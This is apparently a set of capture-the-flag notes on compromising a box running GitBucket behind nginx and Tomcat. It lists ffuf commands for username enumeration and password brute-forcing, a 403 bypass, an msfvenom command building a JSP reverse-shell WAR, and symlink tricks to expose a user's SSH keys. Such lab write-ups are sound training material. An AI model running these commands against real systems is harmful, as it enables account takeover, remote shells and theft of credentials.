
  • Register a new account at gitbucket

  • Bruteforce

    ffuf -u -X POST -d "userName=FUZZ&password=test123&fullName=test&mailAddress=test&extraMailAddresses%5B0%5D=test&extraMailAddresses%5B1%5D=&url=&description=&fileId=" -w ../userlist.txt -mr already -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Valid usernames alex root luis

ffuf -u -X POST -d "userName=root&password=FUZZ&hash=" -w ../rockyou.txt -fr signin -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Remove mutual authentication, setup registration and login features

  • <user username="tomcat" password="[redacted]" roles="manager-gui,admin-gui"/>

  • Bypass nginx reverse proxy 403 [nginx -> tomcat];a=b/html/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=B07EF0732BE104396355D26DD2A56CEE [upload war file]

  • msfvenom --list payloads | grep -ie war

  • msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST= LPORT=7901 -o shell.war

  • tty shell python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Create a soft link ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/ressurect

  • ansible run.yml format: zip mode: 0777

  • ansible if being run by root, create a soft link ln -s of ssh folder and create a zip archive

----------------------------------------------------------------------- Path: ā€¢ bruteforce root login? ā€¢ edit nginx config file to bypass 403 ā€¢ bypass nginx ā€¢ upload war file on tomcat manager to gain reverse shell [root flag] ā€¢ how is registration happening at gitbucket

Last updated